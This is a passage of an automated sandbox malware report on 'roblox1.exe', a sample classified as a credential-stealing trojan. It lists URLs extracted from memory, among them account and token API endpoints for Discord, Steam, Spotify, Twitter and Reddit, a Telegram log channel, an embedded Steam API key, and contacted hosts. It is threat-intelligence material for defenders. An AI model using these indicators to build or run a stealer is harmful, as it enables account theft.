http://crl.dhimyotis.com/certignarootca.crl | stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://curl.haxx.se/rfc/cookie_spec.html | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
http://ocsp.accv.es | stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://speleotrove.com/decimal/decarith.html | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945691017.00000213BE610000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python-attrs/attrs/issues/1329) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap | stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
http://json.org | stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944291079.00000213BE1F4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940263810.00000213BE1F3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551665105.00000213BE184000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938249531.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1941279881.00000213BE162000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1917018094.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/avatars/u.pngu.gifuunsupported | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://github.com/python-attrs/attrs/issues/1330) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://open.spotify.com/user/u | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://wwww.certigna.fr/autorites/0m | stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l | stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://discord.com/api/v8/users/ | stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://twitter.com/i/api/1.1/account/update_profile.jsonareqadescriptionuThere | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://www.attrs.org/en/latest/names.html) | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.twitch.tv/ | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://crl.xrampsecurity.com/XGCA.crl2 | stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://accounts.reddit.com/api/access_tokenaaccess_tokenuandroid:com.example.myredditapp:v1.2.3uBea | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | | high
https://wwww.certigna.fr/autorites/ | stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936493443.00000213BEEF3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmp | false |
                                                                                                                            high
                                                                                                                            https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-fileroblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://open.spotify.com/user/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&sroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://filepreviews.io/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brstub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.attrs.org/en/stable/why.html#data-classes)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://t.me/TaroCloudFreelogsroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crl.securetrust.com/STCA.crlstub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://wwwsearch.sf.net/):roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.accv.es/legislacion_c.htmstub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.attrs.org/en/stable/changelog.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-configroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://cffi.readthedocs.io/en/latest/using.html#callbacksroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, stub.exe, 00000003.00000002.1962486464.00007FFBAAF8B000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crl.xrampsecurity.com/XGCA.crl0stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://thumbnails.roblox.com/v1/users/avatar?userIds=roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.cert.fnmt.es/dpcs/:1Ustub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-feroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.variomedia.de/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://bugs.python.org/issue37179roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.cert.fnmt.es/dpcs/stub.exe, 00000003.00000003.1936295098.00000213BEFDF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939349578.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938008443.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936968912.00000213BEFE4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://packaging.python.org/specifications/entry-points/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.accv.es00stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.reddit.com/user/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://github.com/pyca/cryptography/issuesstub.exe, 00000003.00000002.1949463983.00000213BF514000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.attrs.org/stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://mahler:8092/site-updates.pyroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://crl.securetrust.com/SGCA.crlstub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.python.org/download/releases/2.3/mro/.roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://github.comroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://docs.python.org/3/library/asyncio-eventloop.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://discord.gg/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://python.org/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE59C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://peps.python.org/pep-0749/)-implementingroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.firmaprofesional.com/cps0stub.exe, 00000003.00000002.1948524629.00000213BEF1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934896216.00000213BEF0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://github.com/python-attrs/attrsroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
https://t.me/TaroCloudFreelogs---------------------- | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEC8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1943034035.00000213BDE98000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | false | high
http://crl.securetrust.com/SGCA.crl0 | stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp | false | high
http://crl.securetrust.com/STCA.crl0 | stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.spotify.com/api/account-settings/v1/profile | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | false | high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945192279.00000213BE4FC000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
135.181.65.219 | restores.name | Germany | 24940 | HETZNER-ASDE | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577530
Start date and time: 2024-12-18 15:07:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 63
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: roblox1.exe
Detection: MAL
Classification: mal100.spre.phis.troj.spyw.evad.winEXE@110/57@2/3
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 23.218.208.109, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 2752 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 4424 because it is empty
• Execution Graph export aborted for target roblox1.exe, PID 1364 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: roblox1.exe
Time | Type | Description
09:08:27 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
09:08:54 | API Interceptor | 16x Sleep call for process: powershell.exe modified
09:08:58 | API Interceptor | 8x Sleep call for process: stub.exe modified
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        208.95.112.1roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                        • ip-api.com/json
                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • ip-api.com/json
                                                                                                                                                                                                        x.ps1Get hashmaliciousQuasarBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        msedge.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
